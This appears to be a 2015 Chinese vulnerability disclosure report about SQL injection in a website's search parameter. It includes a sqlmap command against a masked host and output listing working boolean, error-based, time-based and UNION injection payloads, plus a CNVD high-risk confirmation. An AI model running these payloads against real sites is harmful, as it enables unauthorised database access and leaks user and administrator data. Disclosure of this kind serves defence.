2015-09-23: 细节已通知厂商并且等待厂商处理中 2015-09-24: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开 2015-10-04: 细节向核心白帽子及相关领域专家公开 2015-10-14: 细节向普通白帽子公开 2015-10-24: 细节向实习白帽子公开 2015-11-08: 细节向公众公开
rt
主站注入,其它的我就没有去测试了--成功延时
C:\Python27\sqlmap>sqlmap.py -u "http://**.**.**.**/search?q=" -p "q" --dbms=mysql _ ___ ___| |_____ ___ ___ {1.0-dev-nongit-20150609}|_ -| . | | | .'| . ||___|_ |_|_|_|_|__,| _| |_| |_| http://**.**.**.**[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 18:25:06[18:25:06] [WARNING] provided value for parameter 'q' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly[18:25:06] [INFO] testing connection to the target URL[18:25:06] [INFO] heuristics detected web page charset 'UTF-8'[18:25:07] [INFO] heuristics detected web page charset 'ascii'[18:25:07] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDSdo you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: q (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: q=-4917' OR 3773=3773# Type: error-based Title: MySQL OR error-based - WHERE or HAVING clause Payload: q=-9250' OR 1 GROUP BY CONCAT(0x716a717171,(SELECT (CASE WHEN (8307=8307) THEN 1 ELSE 0 END)),0x716a786271,FLOOR(RAND(0)*2)) HAVING MIN(0)# Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT - comment) Payload: q=' AND (SELECT * FROM (SELECT(SLEEP(5)))oxNH)# Type: UNION query Title: MySQL UNION query (random number) - 27 columns Payload: q=' UNION ALL SELECT 1606,1606,CONCAT(0x716a717171,0x6841787657704c525a6f,0x716a786271),1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606,1606#---[18:25:08] [INFO] testing MySQL[18:25:08] [INFO] confirming MySQL[18:25:08] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.10, Apache 2.4.1back-end DBMS: MySQL >= 5.0.0[18:25:08] [INFO] fetched data logged to text files under 'C:\Users\wjl\.sqlmap\
dba能干嘛?我就不说了
导致用户,管理员敏感信息泄露
0-0
危害等级:高
漏洞Rank:10
确认时间:2015-09-24 17:50
CNVD确认所述漏洞情况,暂未建立与网站管理单位的直接处置渠道,待认领。
暂无
感谢对我们的帮助,我们尽快处理!